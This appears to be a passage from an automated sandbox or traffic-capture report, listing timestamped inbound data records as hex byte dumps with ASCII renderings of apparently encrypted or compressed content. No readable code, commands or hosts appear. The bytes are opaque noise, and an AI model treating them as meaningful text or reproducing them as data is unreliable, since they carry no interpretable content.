2021-12-01 18:26:22 UTC	191	IN	Data Raw: 1f 7e b7 b1 b3 cb a8 d3 81 90 3a a3 34 81 09 3d 90 b9 13 ee bb d3 4f 20 05 c1 93 70 f8 0f 20 ea 4e a9 5f 44 74 8b e7 2f 5b 54 06 f8 4e 74 2e 76 b1 d3 93 94 19 c9 02 76 ea 91 38 36 69 8e 9a ee 24 fb 62 4b 0f dc 8c 41 35 a8 ab ab dd 83 1c 82 b4 7b ac 71 6b cb 61 b4 15 bb 72 56 91 2f 9c ca a7 9b 70 e4 24 00 b5 ff 9a 9f 16 8c c0 ae 89 32 db d8 63 4f d6 b8 e3 c5 a6 9d 39 80 d7 7d 43 c3 20 b8 f6 98 81 c8 f8 b0 1c 21 bc d0 d0 ed be 8c cc 8e c0 38 09 00 74 cf 67 5d e0 73 52 c1 26 bb 43 57 da d9 a5 e7 39 97 f1 61 df 40 59 24 73 f4 65 f0 d1 14 50 d0 6f e8 1a 22 6f 6b 80 17 36 4a b2 40 85 58 48 4a 10 10 72 90 73 5e 75 27 e2 88 50 39 e0 7e 29 7f 53 0e 02 62 c4 d8 01 c7 99 e9 61 89 15 3d 3a 1d ae 69 32 5c 45 1f c3 fa bb 91 45 cb 84 7c f8 69 31 00 54 9f 5f 9b c8 91 2c Data Ascii: ~:4=O p N_Dt/[TNt.vv86i$bKA5{qkarV/p$2cO9}C !8tg]sR&CW9a@Y$sePo"ok6J@XHJrs^u'P9~)Sba=:i2\EE\|i1T_,
2021-12-01 18:26:22 UTC	192	IN	Data Raw: b9 8e 7f 55 7b 46 5c 8f a1 d4 46 0c 6e d9 b7 c9 7b 84 65 7e 4c 7c f4 e4 30 61 0e 1a d9 74 19 b9 7d 05 78 d6 30 fe 77 df 1e df 24 45 6b 46 cb 89 96 ac db a2 8c 41 3c 7b b8 4c 22 97 46 a1 0b a2 9f 19 e8 72 7f 42 06 7d 04 95 cd a1 e3 e1 9b f7 b8 00 42 b1 a8 cc d4 6c a8 bf c3 4e 81 ec 85 99 0d f8 47 1f e9 84 a9 70 61 5b 25 56 44 01 d0 92 a5 55 d4 8d e7 a2 82 4d 6c 48 33 a2 28 71 56 a2 f6 d1 91 75 c9 28 a3 58 11 14 19 8b 57 af a0 0f cb af f8 2f 2a 42 69 32 cb 8d 9d 21 2d 48 33 47 2d e2 74 50 eb 00 1b 17 8b 6b 05 df 32 84 9b 88 cd df 0e 7a 02 d9 ce 76 e3 b2 61 aa 45 e3 24 49 e2 72 45 a5 56 76 e9 34 66 91 c2 50 93 b0 0e cf 71 c0 60 6d 6c c7 28 34 43 3e 20 15 ae 6f 23 9d 25 f6 ae 8f c5 5f 61 ef 40 0e bb 2a d8 59 34 45 12 98 62 43 dc 76 f7 63 97 91 ec 1d b3 b7 14 Data Ascii: U{F\Fn{e~L\|0at}x0w$EkFA<{L"FrB}BlNGpa[%VDUMlH3(qVu(XW/Bi2!-H3G-tPk2zvaE$IrEVv4fPq`ml(4C> o#%_a@Y4EbCvc
2021-12-01 18:26:22 UTC	194	IN	Data Raw: 44 9d 3d 01 24 a5 13 0e 0a 5d 6e b5 98 76 62 ed bb fe 2b 2c 2b cc a6 9d 37 6e 40 54 83 ec 3a 62 16 ad af e6 4b 51 7a b2 26 e1 94 df a7 02 c2 74 58 9d 1e 6c 2d e8 d6 e0 e9 fa 0d 28 03 0e b5 5f 4c 11 fe bb 6e 1f ae 7f fe 32 d6 c0 45 af 2f 8f 9b ee 5a 81 f0 37 a5 99 51 2e f4 65 04 38 d3 47 39 ad 23 e3 7f 3f 00 bc 70 f3 b2 be b8 3f ed af cb db 10 8d 97 04 33 ae a9 96 13 01 b4 a1 08 28 30 80 2a 81 ce 3b 7f 7d 76 99 d0 b6 d4 23 eb a1 0f f7 69 4e 48 ad 79 8d 78 70 b3 00 ac bc 28 e8 93 db cd d1 48 48 6c 45 41 69 8e 5e a8 d1 57 fe eb 51 37 09 3c 2b 9b 88 ed ce 6e 4a e4 a0 7e 43 04 81 d8 3a 09 96 ad 20 ba 4d 02 3e 58 2f fa ae 12 b9 a1 ce b0 a6 58 d0 74 a4 a3 00 0a 93 df 24 7d 6d 96 e3 ab a0 61 2f b4 4b 1f c0 e8 12 84 28 d1 78 8c 55 e1 68 2f ab 7c 4a 5e 7b bc 91 33 Data Ascii: D=$]nvb+,+7n@T:bKQz&tXl-(_Ln2E/Z7Q.e8G9#?p?3(0*;}v#iNHyxp(HHlEAi^WQ7<+nJ~C: M>X/Xt$}ma/K(xUh/\|J^{3
2021-12-01 18:26:22 UTC	195	IN	Data Raw: 14 19 a4 7f 4e dc ac 75 db 5d 66 f0 19 3d 1b e5 ba 23 b1 7d 2d 29 e6 64 29 e3 5a 34 da c1 da 79 77 06 dd ac 21 df 3b 51 f3 b6 1b 73 20 92 35 08 22 e0 d3 36 d4 db 4a 96 c0 a3 bd 6e 0c 4b 4d ec 9a 6d 2e bc a3 5c ef a4 33 9e e2 2e 3b 47 43 cc 9e 32 82 f9 2e 65 99 f6 09 4f 5f 97 cc 4b 96 01 e8 10 49 95 38 26 7f a8 66 af 48 c8 29 db 36 97 32 2c 43 25 ca ec cb 08 35 cf 8d 67 ca cc 94 6f 16 1b b2 f8 5b 80 ad 12 30 e2 45 e1 80 da 87 4e ac d3 f5 18 99 3b 4b f3 96 70 64 1e 2b da d8 9d b0 b9 a1 22 52 16 ce f8 f9 6d 4a 41 49 01 5c ce 60 fa 61 6e 82 8b 61 11 36 d1 ad b2 c3 4c 8f 76 21 e9 ae 26 6d 00 9c 95 74 3c 6f 0d 6e 45 a0 2b 2f de 17 33 55 e4 6e 1e 47 d3 4e 44 4f 89 47 f3 e6 51 fb 0c 05 80 f1 2f ec 36 4e 0b 4b 0b 41 36 65 12 7b 6f 00 93 5c 20 a9 8d 5e df dc 86 a8 Data Ascii: Nu]f=#}-)d)Z4yw!;Qs 5"6JnKMm.\3.;GC2.eO_KI8&fH)62,C%5go[0EN;Kpd+"RmJAI\`ana6Lv!&mt<onE+/3UnGNDOGQ/6NKA6e{o\ ^
2021-12-01 18:26:22 UTC	196	IN	Data Raw: 63 de 16 52 e5 f4 7d f0 b8 d5 c6 71 6f e8 27 da bc eb 4c 4f ae 0a be e8 3f 56 88 18 29 66 4b 6e 73 d3 7a e7 a9 63 9e b0 a5 ac ea 34 d5 49 c0 41 81 78 f5 7a 96 c2 54 8c 24 a5 a0 b2 53 72 42 a2 cc 81 49 b8 fa dd 99 40 ab 5a a1 d2 43 4d ce bc 44 bc 6a 5c 5a 5b 51 28 13 23 23 9c bd 7b 86 27 96 c2 d1 e8 2e 7e 79 2b ea 99 17 c5 43 dd 6a 12 09 c4 af 63 bd 3f 9b 68 d2 88 a7 3f 55 33 34 17 8f fc 31 6b 68 65 45 e5 bc 13 96 16 9a d7 84 44 ea 30 e9 02 c4 5b 86 6c 26 4d 61 a2 63 e4 56 6a 50 0c 2f 4b 61 11 93 74 ef f5 eb 98 c6 14 ba 17 23 14 29 7c 81 eb 2b 76 62 3e b3 31 34 a2 82 fb 8e 61 2a c6 e5 5b a9 c8 24 53 06 77 f3 61 9d 1a 31 a8 38 ed 77 c2 cb 5b 74 d5 a9 e8 ab ee f5 90 4f 2b 1b 95 ad 33 bb b4 72 05 b3 7d 1b 37 59 4d 75 50 41 d4 1c c8 fe 72 a3 f4 c4 81 63 1b 94 Data Ascii: cR}qo'LO?V)fKnszc4IAxzT$SrBI@ZCMDj\Z[Q(##{'.~y+Cjc?h?U341kheED0[l&MacVjP/Kat#)\|+vb>14a*[$Swa18w[tO+3r}7YMuPArc
2021-12-01 18:26:22 UTC	197	IN	Data Raw: 0d 1b ff 1b 73 61 fe ba fa 49 47 fd f2 cc a4 9c 02 7f a8 7a af 4d 70 21 61 bd b2 c0 ef 81 a9 1f cc 49 f7 64 c8 94 a4 23 43 6f ae 06 e3 f5 13 a9 fc cb b3 6f 9c 7e e1 88 ba 3f 4e 84 61 79 7d 69 fc d5 f3 97 fa f8 4f e5 de d8 90 b0 b3 a6 d0 50 92 0a e6 b1 72 70 f9 ce 08 95 3d 50 fa 45 5e 89 33 61 29 36 6e 32 f4 82 f4 87 76 2b e6 3c 88 64 bf 8d dc 32 7d 6d 8b 85 0c af 63 77 19 93 36 53 92 00 1e 48 99 f9 82 c7 0d 66 3f 1d e9 f3 14 05 17 6a 59 49 d1 38 96 0c 97 64 3e e1 47 19 fb da c9 54 a8 92 c5 da 32 64 8e e8 0f c1 94 a1 18 d2 f9 4b 11 c4 00 3a 63 fb ae f2 f2 14 11 31 01 6f f5 75 83 65 f0 6e cc b6 ac 35 dc 2b fb c2 38 1f 5d 52 c9 8c e8 47 2a f1 4d 80 4e 01 0b c7 44 62 da 96 b0 d8 26 e6 f1 30 4d 1a f9 18 34 ad 1d d4 f1 bb bd 74 9e 90 c8 13 a7 1b c0 75 52 53 37 Data Ascii: saIGzMp!aId#Coo~?Nay}iOPrp=PE^3a)6n2v+<d2}mcw6SHf?jYI8d>GT2dK:c1ouen5+8]RG*MNDb&0M4tuRS7
2021-12-01 18:26:22 UTC	199	IN	Data Raw: 53 61 60 a8 d1 91 9a 49 ff da ed 33 2c bc d1 f2 b0 82 00 aa df 33 3f 49 af 74 34 10 cb eb db c3 75 1b 24 12 09 a8 9d 1d 8d 1e b1 c5 34 74 b0 93 5e 6e e5 19 d0 e8 01 e1 19 15 85 2b 30 e7 ea 40 10 57 d6 2d 73 c9 a4 e5 ec 42 68 ea c7 3a e0 15 88 cf ed e5 f7 be 59 31 64 cc 56 4e d4 1f 29 05 18 6b bc 56 4a 65 80 3f 33 ab 63 54 15 98 97 23 3f 72 a1 51 9f b4 2e 8d c4 c1 8c 49 de 8a d8 e4 78 cc 2f 64 aa ce a3 4c 3d b7 37 be 08 87 e0 39 52 66 b6 72 31 68 58 2f fb eb 76 1b 11 26 07 00 7e 28 ea 93 f2 c6 a1 6f 93 ac 1b 8b 2d 5c 45 9b e7 c9 68 f7 e5 a4 50 ed 23 ac 9b 0f ea 94 47 46 58 fa e7 4f fc 50 40 65 7d fe ac 83 1e ef 62 b7 ab 6d 2c 71 f2 07 2c df ff 0d b9 9b f7 f7 7b 84 19 0f 62 46 f2 c3 f4 0e 02 9d 02 16 f2 ea 2c aa 01 64 71 88 27 1c 59 50 a0 52 ab c8 e3 47 f7 Data Ascii: Sa`I3,3?It4u$4t^n+0@W-sBh:Y1dVN)kVJe?3cT#?rQ.Ix/dL=79Rfr1hX/v&~(o-\EhP#GFXOP@e}bm,q,{bF,dq'YPRG
2021-12-01 18:26:22 UTC	199	IN	Data Raw: d1 b9 69 d7 e0 dc 38 c1 2e 3f c2 57 63 21 93 6c 28 db 0b 67 ef f6 42 12 a7 60 ab 41 b3 fc 61 5f 92 9c e1 fd 68 65 24 5f d0 31 f3 15 87 f7 c7 25 8c bc 50 e1 23 95 3c 56 06 c9 0c c5 08 4f b9 f6 d0 a8 43 0a c4 90 fe b2 fd 70 e8 8f ea 7b dd 7b 4f 19 8c 29 32 89 22 7d 70 90 45 9d 84 7c 2c 6a 31 00 54 9b 61 f4 c2 dc d3 40 66 fc dd 53 eb d9 42 36 18 c4 8a ef a5 d1 67 7f 4c 4d 81 c1 8f ec ea 4d 96 a0 f2 07 ed 95 2c 2c d9 63 c8 ae 8e 48 64 6d 57 44 c3 32 dc db 08 7b ed 6e 6c 20 d3 ad fa c9 3b c3 d4 ac 74 92 0e 94 8a e9 a6 9c cb 4f 6b a9 aa 1e 82 df 1b f6 42 54 dd 48 85 3b bc 69 21 73 16 cb c3 99 f4 fe 66 39 67 20 22 59 6d 21 2f e3 7e 64 eb a8 67 1a 3d dd cd f0 96 88 18 23 c0 2c ac 0b ff b4 70 65 99 c5 33 2f 44 31 11 df f7 4d cb ad 55 08 2b a3 d2 48 3b 3f b4 3d 05 Data Ascii: i8.?Wc!l(gB`Aa_he$_1%P#<VOCp{{O)2"}pE\|,j1Ta@fSB6gLMM,,cHdmWD2{nl ;tOkBTH;i!sf9g "Ym!/~dg=#,pe3/D1MU+H;?=
2021-12-01 18:26:22 UTC	201	IN	Data Raw: b3 1c 16 28 cf 71 4e 64 a7 5a 2d 61 b0 1e ff 16 15 9b 92 34 97 43 fe 53 fa 88 46 13 8d 9e fa b0 2d 5d 1c 4d c2 a5 bb e1 4e 8a bc f7 78 80 17 f3 a2 4d 34 7d 8d 0c b6 99 2a 56 ee 99 08 ad 7c c5 28 f7 23 a8 dc f6 57 ec d1 b6 79 6e c5 3f fc 0b 03 dc 00 70 46 ee 83 0a 14 f7 97 ed d2 5f d4 b1 62 cb eb 91 13 cd 67 20 f8 d0 5a f3 36 fe 63 34 fd 9d de bd b4 a7 09 15 7b c9 a0 19 db 95 7d b5 a8 7d 8c b4 cf 11 32 35 cd 6d 7d a6 bc 2f a2 f1 ea c6 9a 3c a1 f1 1d df ed 52 cb 80 e8 b3 a0 e0 77 5e b8 77 5a cd dd 40 21 2b 8b cf f1 e1 93 86 e3 9f 01 2a 66 b8 73 5f b3 5f 13 77 19 66 79 53 71 e5 82 ee 88 ce fb e8 53 f2 93 56 83 4e e5 ad db 44 a1 93 21 42 85 88 c3 98 d0 1f 64 b5 cb 1e 53 e8 ac f3 5a a6 cb 8e 2e d6 b7 ed f5 4a 99 3b 89 f4 8c f7 4b d2 a7 15 14 c4 5a de 1a d6 05 Data Ascii: (qNdZ-a4CSF-]MNxM4}V\|(#Wyn?pF_bg Z6c4{}}25m}/<Rw^wZ@!+fs__wfySqSVND!BdSZ.J;KZ
2021-12-01 18:26:22 UTC	202	IN	Data Raw: 09 31 38 71 7b c0 a1 6b 96 f9 d2 02 41 3e 36 6d 1f fa 9d 69 7e e2 a8 dd c8 c4 26 be 0f 22 3c 24 6f 92 5c 4c 3b 78 98 5a d3 df be 15 a3 28 5f 28 90 9f 17 3f ed 4a 58 c5 cd 57 a2 e9 91 1b 6f 0f 77 c6 2f 20 69 85 87 2c df 24 01 c3 8a 97 80 e3 cb e5 e2 f6 fc 75 68 d2 36 d7 dc 29 a9 43 c8 68 d0 95 36 ac 03 98 bc 6e 47 60 a7 33 9a cd 61 40 77 aa d4 22 9a ab f8 ec 79 be 46 70 6b 82 d0 84 e9 20 1e af 6b 8a c5 c8 9f 5e 4b b2 6d 29 46 bd ed 9e 74 94 97 cc c5 f9 53 63 20 19 a5 4f 13 4a b2 50 cd 2f 38 93 de c1 32 7f 5a a7 fb 01 35 34 5c ad 6e 35 6e 6e b3 1a 4e 34 b5 97 f1 9c 68 07 da c5 fe ef b9 05 93 fc e9 90 62 86 34 44 f5 37 d5 1e c9 b2 04 07 e3 47 7c 03 42 65 7d 20 12 f2 6d f9 f4 3e 55 f3 ab 07 3a 46 6b 69 82 5c 84 60 ae c7 66 5d 90 c4 9a 30 a7 3d 0b 59 d5 50 4f Data Ascii: 18q{kA>6mi~&"<$o\L;xZ(_(?JXWow/ i,$uh6)Ch6nG`3a@w"yFpk k^Km)FtSc OJP/82Z54\n5nnN4hb4D7G\|Be} m>U:Fki\`f]0=YPO
2021-12-01 18:26:22 UTC	203	IN	Data Raw: 60 63 56 d2 e9 f0 2c 16 da ef 61 78 a3 e3 c4 7b 4d 30 70 10 d0 ce 5b 9a 35 3b ac cf 91 a2 6c 60 54 88 05 a0 93 ab 14 85 c2 09 bd fc 7f 8c b4 e7 0c 51 4e 74 f6 42 b6 ce 61 27 d6 2a d6 f2 07 5a f1 15 31 72 fe 07 c4 9c f1 0f 0a 6a cc 89 36 0a 63 36 63 47 0b 8d 3f 36 a1 48 77 12 cc d1 2c 42 cb a0 90 0c 4b 61 a8 5c 61 bc 56 55 93 73 bd 58 c8 df 90 fc 0f d3 8d 08 87 ad b0 d8 44 7c 20 10 5a 7d bd e7 07 97 ff e1 a6 bf b6 3a e0 0f 6b 1b 66 18 ef 62 e1 0a 3b 28 b8 b5 58 34 27 a0 ea 3c 13 66 a7 24 56 83 6d b2 aa 64 a0 57 a6 5a 00 38 cc 2d b2 cd f7 45 b7 e6 d9 1d df d6 54 09 5a ef 02 b9 22 f1 82 59 49 1d 4c 23 25 94 92 30 50 db 26 8e c7 80 92 54 e8 35 55 e2 9c e6 0c c9 21 2c 66 f2 a1 d6 2d 49 39 01 38 c9 85 f7 45 09 47 d4 9b fd a1 7c ac f6 a0 b8 55 cf ee 5a 60 75 0d Data Ascii: `cV,ax{M0p[5;l`TQNtBa'*Z1rj6c6cG?6Hw,BKa\aVUsXD\| Z}:kfb;(X4'<f$VmdWZ8-ETZ"YIL#%0P&T5U!,f-I98EG\|UZ`u
2021-12-01 18:26:22 UTC	205	IN	Data Raw: 84 24 8e eb e1 a7 e5 2d 8e 79 97 2f 6a 34 86 ff c8 31 2f 23 b4 e5 d1 cb 51 c6 65 66 54 2b f5 18 31 d3 56 4a 4f 91 50 21 43 67 e4 6a 67 1a 6e e1 98 d2 f2 61 23 a3 c0 2c 39 34 80 2d 8a 24 26 f7 72 d0 ba 2c 7e 47 e2 25 64 db 0b 0c 2b a3 62 4a 3b 3f b4 89 a4 3c 3e 40 30 b5 cb 59 89 f3 09 d3 6b 97 8c a1 c8 b4 97 91 0a b2 c0 da ba 22 62 ed cd 1e c8 e1 7a 4d 97 88 13 c4 e5 42 3c 9b f4 d4 55 d2 10 6b 4d 82 17 3c 77 87 80 cc 21 46 b3 d6 c2 23 46 bb 16 64 c4 72 1e 7b dc dc e0 f6 44 55 a0 ce fd 76 82 dc 74 94 64 62 99 d4 de a9 93 8a c3 b1 c4 eb a7 b3 50 4a 3f dd cc e1 ca b3 8f af d4 65 3d 21 b7 af 0f c3 c6 8a 1d c5 10 6d f2 ce 08 9d b4 70 40 f7 79 fa 10 64 b4 69 2d 45 d9 5f 01 53 c5 9f 78 51 eb 7c e5 74 8b a3 d7 6a 9e 90 84 5f 5a a8 85 28 a4 ab 2e d0 16 80 bd 78 4a Data Ascii: $-y/j41/#QefT+1VJOP!Cgjgna#,94-$&r,~G%d+bJ;?<>@0Yk"bzMB<UkM<w!F#Fdr{DUvtdbPJ?e=!mp@ydi-E_SxQ\|tj_Z(.xJ
2021-12-01 18:26:22 UTC	206	IN	Data Raw: 5b bc 77 5b c5 d1 b4 10 ca 5f bd f8 57 5f 47 20 6a a3 46 eb cc e8 aa 3c 3b 03 3f 8a df 46 3c af bd 70 83 4c f8 8e 95 01 30 5f e6 cb fa d1 49 1f 2d 03 c9 87 f7 d5 5e b1 f3 5b 24 d9 3b 41 02 a7 3c 30 f6 43 df 1e 8a 7e 00 8a 7b 26 8b 92 01 d4 f1 a4 6c 64 74 21 4a 24 2c 58 e8 36 60 b0 10 1b e9 80 4c 56 eb df 59 af 83 81 c3 13 2a 88 75 75 25 76 98 59 91 8a 0c d7 b2 f9 8d eb d0 64 b7 5d 19 66 22 c2 46 9c ca 0c 89 99 a3 a5 39 d5 5d 84 20 50 10 bd d3 21 95 32 82 50 a4 cb 70 ec f8 bb 29 08 35 eb 44 29 f0 9e 12 06 af 62 07 aa 2b 21 e2 48 eb f0 bd c1 e3 62 fd c3 20 3a a2 63 4d f7 25 40 8d 02 ff f8 35 ee 86 42 69 6c 28 07 c2 af 06 09 57 7e 92 66 e8 4a 15 9e a3 28 d8 5b be 93 61 7b 6a 46 54 3a 66 da 63 8b c8 2d 70 eb f8 31 20 93 82 23 fc c4 80 8f 5f e9 1b 27 73 e4 bb Data Ascii: [w[_W_G jF<;?F<pL0_I-^[$;A<0C~{&ldt!J$,X6`LVY*uu%vYd]f"F9] P!2Pp)5D)b+!Hb :cM%@5Bil(W~fJ([a{jFT:fc-p1 #_'s
2021-12-01 18:26:22 UTC	207	IN	Data Raw: 31 b7 04 42 76 73 f9 dc 96 59 99 aa 43 4f cd b0 a4 68 ce 05 c5 ab 76 fc bd 9d e9 35 b1 30 ac dd 4a ae 26 17 6c c7 e9 94 d9 47 d0 30 a2 c2 54 57 c7 b5 7d 77 ed be c8 5e 91 b8 68 e6 6f 75 48 86 f3 72 21 95 4e 64 ae f1 a6 99 41 09 df 56 76 f0 8e 01 9b ef b0 4a 49 de e7 a9 01 fc 78 f0 8e eb 66 6f 50 5a 32 8d e1 47 08 de 1f 7b 8f 78 ed 84 ee 82 2c 36 0f e2 69 cd a4 53 66 87 9d 9c a5 7f 54 c7 d5 12 01 e0 6f e4 91 0a 48 ba d3 c5 75 37 a8 6c 22 33 7a 9e 31 ea 91 ce bc 5d c8 c7 57 f1 f8 0b b4 3e a2 94 21 64 95 e3 b0 81 bb 72 fd 3a 98 0c e1 25 ee 7d d7 8e bc fa 37 90 91 4c 36 3f 67 98 8c 1e 48 74 22 39 2b bd 2e d7 b4 6e 2a 13 c7 af 73 84 88 71 d6 f9 db d7 68 1e 24 6e 2b 15 70 66 a0 6b 44 9d c7 7f c9 22 9d 97 0f 7a 02 b1 3e 5e 99 8d b7 f9 ae 8d 79 7e 4c 60 d6 0f a9 Data Ascii: 1BvsYCOhv50J&lG0TW}w^houHr!NdAVvJIxfoPZ2G{x,6iSfToHu7l"3z1]W>!dr:%}7L6?gHt"9+.n*sqh$n+pfkD"z>^y~L`
2021-12-01 18:26:22 UTC	208	IN	Data Raw: a9 8a b9 a7 2e c7 c2 83 3f 18 ba c6 2f 5b 89 a0 25 ce 0c 7f c8 4e 0d 21 75 15 a4 9b 89 4a 42 2e 13 42 cf c9 fd 5a 9a e7 9f e7 d0 07 e8 9d ae 1f ee 78 6b ac 31 c3 65 f2 a3 df ed 8d 18 d8 cf 61 bd 75 09 1f af 68 40 70 24 10 a8 1c 57 99 44 27 97 65 89 89 73 54 9c 6f c2 d4 3d 2e 93 2b 91 3e 79 c0 98 74 5e 48 2d 01 3e e1 58 9d 1a b1 2d e8 de 51 05 f4 5c 60 75 3f c7 b0 70 70 cb bb 86 f0 3a 38 c1 80 43 ce 54 ae 5b be 48 a1 d6 5a c8 86 5d 66 ae a3 fa 48 f3 44 eb 57 37 e8 27 97 c5 c8 6b 80 17 e6 49 b2 40 5d 96 01 11 63 23 56 3a 79 80 8e 55 da 8f b9 27 ef 14 2b 73 10 b7 1c 33 49 c5 26 39 59 df 00 e5 72 d7 dd e5 20 81 ca 26 b9 79 cf b9 04 98 ce be 97 80 8b 1e 70 00 56 cf 80 25 bb 10 9e 1e 71 6e 4b de 55 54 04 f8 18 a1 96 9a b2 10 95 c4 3e 60 95 1a 9e 04 0c 95 89 b7 Data Ascii: .?/[%N!uJB.BZxk1eauh@p$WD'esTo=.+>yt^H->X-Q\`u?pp:8CT[HZ]fHDW7'kI@]c#V:yU'+s3I&9Yr &ypV%qnKUT>`
2021-12-01 18:26:22 UTC	210	IN	Data Raw: 26 e1 de 6d 05 ad 81 20 06 8e eb b5 50 4a db de cc e1 c2 37 a4 66 85 66 d7 62 4e 21 e7 e1 cc e0 1d 1d d0 c9 e5 4d 1b 8a ff 49 7f 7d 24 3c bc a8 74 5e 9e 9e 5e 79 ad 0e 86 9f d8 51 60 2a 56 7a d2 01 ea 31 c0 ba 1b 63 d1 6a 0a a8 a1 2a c2 51 39 e9 ed d0 1f b3 bf d3 f9 03 b7 bf e0 04 ec 96 e3 28 f8 99 76 de fa 02 33 36 80 ea 5a f9 5f 2a 50 da 40 9c 0b 21 c0 db 3e c2 a2 54 25 70 f8 59 2d 2f e5 73 d7 a8 a6 89 f9 eb 9e 84 0e ce 6a c9 18 64 c0 de 4a a1 00 f1 23 5b bc 54 cd e1 b2 3d 4f b1 3e 65 8a ab 52 fc f0 56 aa ac 80 67 9e 1b 08 3b e5 83 c7 21 bc 76 93 3c 4a 65 2f f8 7a e4 61 a8 8c a5 3e 93 c5 e3 89 47 a1 ad cb d1 1f ac 01 50 17 73 38 d2 c6 46 de d2 35 8f 5c 1c c3 ec d8 c4 00 51 ba 49 71 61 59 b2 16 67 e8 31 13 b9 75 42 c9 7b 76 d4 e0 38 3d 09 6e c0 4d c0 b4 Data Ascii: &m PJ7ffbN!MI}$<t^^yQ`Vz1cjQ9(v36Z_*P@!>T%pY-/sjdJ#[T=O>eRVg;!v<Je/za>GPs8F5\QIqaYg1uB{v8=nM
2021-12-01 18:26:22 UTC	211	IN	Data Raw: 50 9d e4 0c b5 c7 55 3a 59 9f b5 0d 62 93 15 5e 97 2d 01 4a ff e0 fc 90 30 3a 85 ea 6a ee f2 84 dc 60 4a 8f f6 af 72 f7 67 e5 6a c7 b1 9c 21 31 3e f0 de 21 7d e3 d3 64 ea 24 de c5 99 01 7d 17 3c 8a fa 14 f8 cf 81 9c 7f 3e 46 7a 7f 87 d2 36 76 b0 f7 e4 bb 42 26 07 71 da f8 18 fa e7 b1 73 8a 7a 08 5d 9c 09 2f 49 4e ba 2c c1 49 4d 6a 04 a5 63 02 11 95 91 10 e2 80 21 51 48 fd 86 8e cf 1b 40 b8 32 25 d8 74 00 6b 04 e5 dc 07 82 d3 16 71 19 b5 de 55 8a 17 a7 b7 59 d3 c1 fa 31 0d 3b 4a f1 a8 cf 23 fb 94 d8 1b 1e c1 94 eb 18 f3 5c d7 22 94 e5 da 1c ba 78 53 4e 29 88 83 08 9f 24 08 2b 90 73 88 ae 24 1f 2c 75 d4 46 f4 88 4e c2 f0 5c da 73 b6 23 18 e8 aa 6c 12 6b 8a 48 bd 56 c5 58 e7 76 df af 98 67 30 1f 2f 14 ee 50 6e a0 29 30 4d 3c b3 39 67 ea 1e c8 05 b7 97 e5 39 Data Ascii: PU:Yb^-J0:j`Jrgj!1>!}d$}<>Fz6vB&qsz]/IN,IMjc!QH@2%tkqUY1;J#\"xSN)$+s$,uFN\s#lkHVXvg0/Pn)0M<9g9
2021-12-01 18:26:22 UTC	212	IN	Data Raw: e0 e9 dd 41 3b b3 74 ac 6c a0 1e fd 11 ff 60 92 36 90 e5 ed f0 66 76 58 f9 5f 6d 92 6e 4b 30 f0 de 3f fc 7f 13 9d a0 da 8f 7b e9 28 23 78 af 5f 1e 22 34 58 d7 26 bf 38 09 38 9f 93 02 8c 47 9c cd a8 85 83 fd 86 75 89 1c 4d 3d 20 12 01 8c 8a 43 e2 db 2b df 6c 9d 40 68 1a 30 da c4 52 a2 42 65 41 00 f3 c4 c7 28 f7 ef be 88 29 ef e4 d1 b6 5b 5a c2 0c 03 5c ad e2 7e 57 09 11 22 56 fa 2a 2f 6e 16 53 a8 a7 fb 3c 53 93 13 cd 6f 2e 4b 79 9f 87 25 de d3 7f bd 9d 5d 2a ee 73 77 01 2a 9e f7 fe 42 16 7f 5f d7 59 fe 6f e5 b4 06 27 25 aa 2a 49 31 ed 66 7e a7 53 26 ad 28 4f 4d d9 ed 91 56 b5 8d a7 0f 6a 6a 41 dd 22 2b 83 6a 6c a1 7d 9a c0 cb e8 bf 4c fc 17 49 91 cf d9 2b 00 89 56 eb bf 4f e0 31 e8 3d 77 54 a0 3f 07 92 1a eb 49 50 8d 24 ab b4 df ca c9 bc 9c dc ab 7e 36 3c Data Ascii: A;tl`6fvX_mnK0?{(#x_"4X&88GuM= C+l@h0RBeA()[Z\~W"V/nS<So.Ky%]swB_Yo'%I1f~S&(OMVjjA"+jl}LI+VO1=wT?IP$~6<
2021-12-01 18:26:22 UTC	213	IN	Data Raw: 77 38 f6 03 d2 ae f0 7e f4 ae bf d8 7c 14 d3 2f d2 00 d5 01 62 2c 80 a0 4d 6a 06 ad 77 2d 2c 06 56 58 6f cd c1 48 24 b5 86 f8 d5 49 0c 7f 4d 3c 19 63 00 d6 6d 54 9b 44 16 2b d1 9d cd 0d 14 a8 d9 c8 8d a4 c4 0a 27 a5 d1 84 7e 31 cf 25 b6 97 43 80 d8 81 9d 9c 38 9f b1 96 0c 2f 43 86 fa 50 17 60 6d 47 fc 16 2a 83 74 d8 ec 89 e3 e2 f0 c2 fb a9 f2 b8 82 29 b9 f5 1d 3a 6c e7 68 8f 73 5c 24 ac a5 27 67 37 1e 6d b7 2a e7 2f ba 6e 63 c8 51 d1 73 93 07 3c 66 28 64 31 7d 22 ad 41 b8 ee a5 e7 60 50 30 dc bd 8f 0f 33 74 65 06 5c 6c c6 25 68 c0 09 cb 98 f1 40 33 fe d7 cc a5 c1 c9 dc 7c 5f da b7 96 46 85 52 ce 4c 1b 7a 57 77 8a 81 30 e7 fb 61 01 ae fa f1 28 a6 9f 12 b3 d1 73 4f 79 12 c0 ab 69 07 a6 6b e2 40 c4 cd e0 bd e9 d6 cd 70 f0 9c 6e 4d ea 3b 33 1e 80 00 e3 47 1f Data Ascii: w8~\|/b,Mjw-,VXoH$IM<cmTD+'~1%C8/CP`mGt):lhs\$'g7m/ncQs<f(d1}"A`P03te\l%h@3\|_FRLzWw0a(sOyik@pnM;3G
2021-12-01 18:26:22 UTC	215	IN	Data Raw: 78 64 bc 80 7a 67 f3 c4 6e 43 ba 8d 19 21 93 93 4c 65 07 f8 38 df 61 a8 6f 5a 02 d2 c5 6e 89 ca 29 55 07 77 09 79 11 22 56 22 0f b3 e9 57 53 bf a0 14 a3 e3 18 98 79 30 70 10 00 fa 8b 88 5f b6 10 d7 75 e3 1f b8 24 42 8e 9f 9e f7 73 7d 8a 05 e1 28 86 4e 34 6e 4d 55 9f 65 80 48 b6 45 e5 16 72 2a d6 48 0c 50 f1 1d 06 51 f8 ae 51 aa a7 f0 94 e9 0a c8 36 5a 78 06 83 44 0b 52 83 36 4d 35 c2 b3 90 3d e5 f6 9c 23 50 be 9f b0 16 49 e0 8d 63 bd ac b4 e1 3f 01 54 72 03 7f d7 c8 47 a1 b0 d7 13 07 89 84 68 20 f6 c9 48 90 a0 3f e9 f1 55 f2 84 08 f0 1d 5b ca a0 07 58 86 48 b0 f5 f3 c5 5c cb 4e bd 31 1a 51 ef 9a c0 2c c2 6d 0d 1a c2 a8 07 79 26 9d 30 be 6c 3f 18 86 e8 2f 5b 80 1b df b3 44 87 c8 4e 6d 28 26 